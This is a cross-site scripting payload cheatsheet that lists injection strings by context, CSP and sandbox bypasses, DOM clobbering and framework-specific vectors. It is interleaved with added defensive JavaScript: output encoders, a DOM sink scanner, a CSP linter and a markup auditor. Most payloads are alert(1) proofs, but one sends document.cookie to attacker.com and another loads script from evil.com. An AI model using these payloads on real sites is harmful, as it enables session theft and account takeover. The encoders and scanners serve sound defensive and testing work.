XSS cheatsheet
Common Injection Contexts
HTML Context
"><img src=x onerror=alert(1)>
<script>alert(1)</script>
<svg/onload=alert(1)>
<math><mi//xlink:href="data:x,<script>alert(1)</script>">
Attribute Context
"><input autofocus onfocus=alert(1)>
"><a href="javascript:alert(1)">x</a>
"><body onload=alert(1)>
"><iframe srcdoc="<script>alert(1)</script>">
JavaScript Context
';alert(1);//
"+alert(1)+"
'+alert(1)+'
`-alert(1)-`
setTimeout`alert(1)`
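Defensive counterpart to the three contexts above, added here as an example (not part of the original cheatsheet): one output encoder per injection context, plus a renderer that places the same untrusted value into all three. The payloads above work because a value lands in a context with no encoding or with the wrong encoder; the fix is chosen by where the value lands, not by what it contains. Function names and the sample value are this example's own.

```javascript
// Added example, not from the cheatsheet: context-specific output encoding.

// HTML text context (between tags): neutralise the characters that can open a
// tag or terminate an attribute value.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Attribute value context: encode everything except alphanumerics. The caller
// must still quote the attribute; an unquoted value ends at whitespace, which
// is what the `" autofocus onfocus=...` style payloads rely on.
function encodeForAttribute(untrusted) {
  return String(untrusted).replace(/[^a-zA-Z0-9]/gu,
    (c) => '&#x' + c.codePointAt(0).toString(16) + ';');
}

// JavaScript string literal context: \xHH / \uHHHH escapes, so quotes, line
// terminators and '<' (which could otherwise form </script>) cannot change
// how the surrounding script is parsed.
function encodeForJsString(untrusted) {
  return String(untrusted).replace(/[^a-zA-Z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0');
    if (cp < 0x10000) return '\\u' + cp.toString(16).padStart(4, '0');
    return '\\u{' + cp.toString(16) + '}';
  });
}

// One untrusted value rendered into all three contexts of a page.
function renderGreeting(displayName) {
  return [
    '<p>Hello, ' + encodeForHtml(displayName) + '</p>',
    '<input name="display" value="' + encodeForAttribute(displayName) + '">',
    "<script>var displayName = '" + encodeForJsString(displayName) + "';</script>",
  ].join('\n');
}

// Constructed sample built from two of the payloads listed above.
const SAMPLE_NAME = '"><img src=x onerror=alert(1)>\';alert(1);//';
console.log(renderGreeting(SAMPLE_NAME));
```

The JS-string encoder is deliberately aggressive: an encoded value is still a valid string literal that decodes back to the original, so nothing is lost, but it can never close the literal or the script element.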
Bypasses & Obfuscation
%3Cscript%3Ealert(1)%3C/script%3E
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
<script>alert(1)</script>
eval`alert(1)`
setTimeout`alert\`document.domain\``
"-confirm`1`// '-confirm`1`//
CSP Bypasses
<script src="data:text/javascript,alert(1)"></script>
<iframe srcdoc="<script>alert(1)</script>">
<svg><foreignObject><iframe srcdoc="<script>alert(1)</script>"></iframe></foreignObject></svg>
Non-Script Elements
<svg/onload=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
<keygen autofocus onfocus=alert(1)>
<isindex onfocus=alert(1)>
<object data="javascript:alert(1)">
DOM-Based XSS
document.write(location.hash.slice(1))
eval(location.search.slice(1))
new Function(location.hash.slice(1))()
# URL: https://target.com/#<img src=x onerror=alert(1)>
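A review-time check for the pattern shown above, added as an example (not from the original cheatsheet): a line-oriented scanner that flags DOM XSS sinks fed directly from URL-controlled sources. It is a code-review / CI heuristic, not taint analysis: it misses flows through variables and may flag values that were sanitised. The source and sink lists and the sample JavaScript are this example's own.

```javascript
// Added example, not from the cheatsheet: sink/source scanner for DOM XSS.

// Inputs a page reads that the URL or another window controls.
const DOM_SOURCES = [
  'location.hash', 'location.search', 'location.href', 'document.URL',
  'document.referrer', 'window.name', 'document.cookie',
];

// Sinks that interpret a string as markup, code or a navigation target.
const DOM_SINKS = [
  'document.write', 'document.writeln', 'innerHTML', 'outerHTML',
  'insertAdjacentHTML', 'eval', 'new Function', 'setTimeout', 'setInterval',
  'location.assign', 'location.replace', 'srcdoc',
];

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Returns one finding per line that references both a sink and a source.
function findDomXssCandidates(jsSource) {
  const findings = [];
  jsSource.split('\n').forEach((line, idx) => {
    const sinks = DOM_SINKS.filter((s) =>
      new RegExp('\\b' + escapeRegExp(s) + '\\b').test(line));
    const sources = DOM_SOURCES.filter((s) => line.includes(s));
    if (sinks.length > 0 && sources.length > 0) {
      findings.push({ line: idx + 1, sinks, sources, text: line.trim() });
    }
  });
  return findings;
}

// Constructed sample: the cheatsheet's three sink lines plus safe variants.
const SAMPLE_JS = [
  "const el = document.getElementById('out');",
  'document.write(location.hash.slice(1));',            // sink + source
  'eval(location.search.slice(1));',                    // sink + source
  'new Function(location.hash.slice(1))();',            // sink + source
  'el.textContent = location.hash.slice(1);',           // safe: rendered as text
  "el.innerHTML = '<b>static</b>';",                    // sink, but constant input
  "window.addEventListener('hashchange', () => eval(location.hash.slice(1)));",
].join('\n');

for (const f of findDomXssCandidates(SAMPLE_JS)) {
  console.log(`line ${f.line}: ${f.sinks.join(',')} <- ${f.sources.join(',')}: ${f.text}`);
}
```

The safe line in the sample (`textContent`) is the remediation for the `document.write` case: the fragment is inserted as text, never parsed as markup.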
Reflected/Stored Vectors
<input value="<script>alert(1)</script>">
Tricks
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<svg><script xlink:href=data:;alert(1)></script></svg>
<a href="javascript:alert`XSS`">click</a>
div { background-image: url("data:text/html,<svg onload=alert(1)>"); }
Polyglots
<svg><script xlink:href=//evil.com></script>
<svg/onload=confirm`1`//</script>
Advanced & Niche XSS Payloads & Techniques
Advanced Polyglots & Parser Quirks
"';!--"<>'"!--<img src=x onerror=alert(1)>
<svg/onload=alert(document.domain)>
<math><mi//xlink:href="data:x,<script>alert(1)</script>">
<svg><script xlink:href=data:text/javascript;base64,YWxlcnQoMSk=></script></svg>
<iframe srcdoc="<svg/onload=alert(1)>">
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<script nonce="">alert(1)</script> <!-- CSP bypass if nonce is empty -->
DOM Clobbering & MutationObserver
<input name="foo" id="document"> <!-- Overwrites document object -->
<form id="alert"></form> <!-- Clobber alert function -->
javascript:document.forms[0].id='alert';alert('clobbered');
MutationObserver.prototype.observe = function() { alert('Mutation XSS'); };
window.addEventListener('hashchange', () => eval(location.hash.slice(1)));
CSP Bypass Techniques
<script src="data:text/javascript,alert(1)"></script> <!-- Data URI script tag -->
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<img src=x onerror="fetch('https://attacker.com/?cookie='+document.cookie)">
<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
<iframe sandbox="allow-scripts" srcdoc="<script>alert(1)</script>"></iframe>
Trusted Types bypass (if misconfigured):
<script>
window.trustedTypes.createPolicy('default', { createScript: (s) => s })(`alert(1)`);
</script>
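A linter for Content-Security-Policy header values, added as an example (not from the original cheatsheet), that flags the settings the bypasses in this section depend on: `'unsafe-inline'` without a nonce or hash, `'unsafe-eval'`, `data:` in `script-src`, an empty nonce, an unrestricted `object-src`, a missing `base-uri`, and no `require-trusted-types-for` (which is what lets a passthrough Trusted Types policy like the one above go unnoticed). Directive names and keywords are those of the CSP specification; the finding texts, the parser and the sample headers (including the placeholder nonce value) are this example's own.

```javascript
// Added example, not from the cheatsheet: CSP header linter.

// Parse "directive value value; directive value" into an object. Per the CSP
// spec, a repeated directive keeps its first occurrence and ignores the rest.
function parseCsp(header) {
  const policy = {};
  header.split(';').forEach((part) => {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) return;
    const name = tokens[0].toLowerCase();
    if (!(name in policy)) policy[name] = tokens.slice(1);
  });
  return policy;
}

function lintCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  const scriptSrc = policy['script-src'] || policy['default-src'];
  if (!scriptSrc) {
    findings.push('no script-src or default-src: inline and remote scripts are unrestricted');
    return findings;
  }
  const src = scriptSrc.map((t) => t.toLowerCase());
  const hasNonce = src.some((t) => /^'nonce-[a-z0-9+/=_-]+'$/.test(t));
  const hasHash = src.some((t) => /^'sha(256|384|512)-/.test(t));

  // CSP Level 2+ browsers ignore 'unsafe-inline' once a nonce or hash is present.
  if (src.includes("'unsafe-inline'") && !hasNonce && !hasHash) {
    findings.push("script-src 'unsafe-inline' without nonce/hash: injected inline scripts and event handlers run");
  }
  if (src.includes("'unsafe-eval'")) {
    findings.push("script-src 'unsafe-eval': eval(), new Function() and string setTimeout() accept injected code");
  }
  if (src.includes('data:')) {
    findings.push('script-src allows data: so <script src="data:..."> loads arbitrary scripts');
  }
  if (src.includes('*') || src.some((t) => /^(https?|blob|filesystem):$/.test(t))) {
    findings.push('script-src allows any host via * or a bare scheme');
  }
  if (src.includes("'nonce-'")) {
    findings.push("empty 'nonce-' value is malformed and ignored by browsers; do not rely on it");
  }
  if (src.includes("'strict-dynamic'") && !hasNonce && !hasHash) {
    findings.push("'strict-dynamic' has no effect without a nonce or hash");
  }
  if (!policy['object-src'] && !policy['default-src']) {
    findings.push("object-src unrestricted: set object-src 'none' (blocks <object data=\"javascript:...\">)");
  }
  if (!policy['base-uri']) {
    findings.push('base-uri missing: an injected <base> can redirect relative script URLs');
  }
  if (!policy['require-trusted-types-for']) {
    findings.push("require-trusted-types-for 'script' not set: innerHTML/eval sinks accept plain strings");
  }
  return findings;
}

// Constructed sample headers; the nonce is a placeholder, not a real value.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' data:";
const STRICT_CSP = "script-src 'nonce-R4nd0mV4lu3' 'strict-dynamic'; object-src 'none'; base-uri 'none'; require-trusted-types-for 'script'";

for (const h of [WEAK_CSP, STRICT_CSP]) {
  console.log(h, '\n  ->', lintCsp(h).length ? lintCsp(h).join('\n     ') : 'no findings');
}
```

With `require-trusted-types-for 'script'` enforced, a default policy still has to exist, but it should sanitise its input rather than return it unchanged as the `createScript: (s) => s` policy above does; the `trusted-types` directive can additionally pin which policy names may be created.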
Framework-Specific XSS
AngularJS:
<div ng-app ng-csp><div ng-bind="constructor.constructor('alert(1)')()"></div></div>
React:
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}}/>
Vue:
<div v-html="`<img src=x onerror=alert(1)>`"></div>
HTTP Header Injection
Set-Cookie: SESSIONID=abc123; HttpOnly
X-Forwarded-Host: attacker.com<script>alert(1)</script>
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
Sandbox Escape Vectors
<iframe sandbox="allow-scripts allow-same-origin" srcdoc="<script>alert(1)</script>"></iframe>
<iframe sandbox="allow-scripts" src="javascript:alert(1)"></iframe> <!-- some browsers allow this -->
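A review-time scanner for two markup-level issues from the sections above, added as an example (not from the original cheatsheet) and serving both the DOM Clobbering section and this Sandbox Escape section: it reports `id`/`name` values that collide with globals the page's scripts read, and iframe `sandbox` settings that defeat the sandbox (`allow-scripts` together with `allow-same-origin`, or a `javascript:` `src`). Both checks share one attribute extractor. The regexes handle well-formed tags only; a real audit should run on a parsed DOM. The function names, the sample markup and the hypothetical application's globals list are this example's own.

```javascript
// Added example, not from the cheatsheet: markup audit for clobbering and sandbox misuse.

// Extract {name, attrs} for each start tag; quoted attribute values may contain '>'.
function extractTags(html) {
  const tagRe = /<([a-zA-Z][a-zA-Z0-9-]*)((?:\s+[^\s>"'=\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>"']+))?)*)\s*\/?>/g;
  const tags = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrRe = /([^\s>"'=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+)))?/g;
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4] ?? '';
    }
    tags.push({ name: m[1].toLowerCase(), attrs });
  }
  return tags;
}

// id/name values that collide with global names the scripts look up without
// declaring them (e.g. `window.config || defaults`); named element access can
// shadow such lookups.
function findClobberingElements(html, globalsRead) {
  const targets = new Set(globalsRead);
  const findings = [];
  for (const tag of extractTags(html)) {
    for (const attr of ['id', 'name']) {
      const value = tag.attrs[attr];
      if (value !== undefined && targets.has(value)) {
        findings.push({ element: tag.name, attr, value });
      }
    }
  }
  return findings;
}

// Sandbox token combinations and srcs that make the sandbox pointless.
function findSandboxIssues(html) {
  const issues = [];
  for (const tag of extractTags(html)) {
    if (tag.name !== 'iframe' || tag.attrs.sandbox === undefined) continue;
    const tokens = new Set(tag.attrs.sandbox.toLowerCase().split(/\s+/).filter(Boolean));
    if (tokens.has('allow-scripts') && tokens.has('allow-same-origin')) {
      issues.push('allow-scripts with allow-same-origin: a same-origin framed document can remove its own sandbox attribute');
    }
    if ((tag.attrs.src || '').trim().toLowerCase().startsWith('javascript:')) {
      issues.push('javascript: URL in iframe src: treat as inline script; block with script-src and never emit it from templates');
    }
  }
  return issues;
}

function auditMarkup(html, globalsRead) {
  return { clobbering: findClobberingElements(html, globalsRead), sandbox: findSandboxIssues(html) };
}

// Constructed sample built from the cheatsheet's clobbering and sandbox lines.
const SAMPLE_HTML = [
  '<input name="foo" id="document">',
  '<form id="alert"></form>',
  '<img id="logo" src="/logo.png">',
  '<iframe sandbox="allow-scripts allow-same-origin" srcdoc="<p>untrusted</p>"></iframe>',
  '<iframe sandbox="allow-scripts" srcdoc="<p>untrusted</p>"></iframe>',
  '<iframe sandbox="allow-scripts" src="javascript:alert(1)"></iframe>',
].join('\n');
// Globals a hypothetical application's scripts look up by name.
const GLOBALS_READ = ['document', 'alert', 'config'];

console.log(JSON.stringify(auditMarkup(SAMPLE_HTML, GLOBALS_READ), null, 2));
```

The `globalsRead` list is the part worth maintaining: it should be generated from the application's own scripts (every undeclared identifier read from `window` or `document`), since that is exactly the set an injected `id` or `name` can interfere with.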
Timing & Side-Channel Attacks
These vectors use <img src=... onerror=...> requests or CSS animations to exfiltrate data over time.
Example: a CSS-based keylogger, or a timing attack that measures style changes.
<style>
@keyframes x { from { opacity: 0 } to { opacity: 1 } }
input { animation-name: x; animation-duration: 1s; animation-iteration-count: infinite; }
input:invalid { animation-play-state: paused; }
</style>
References & Further Reading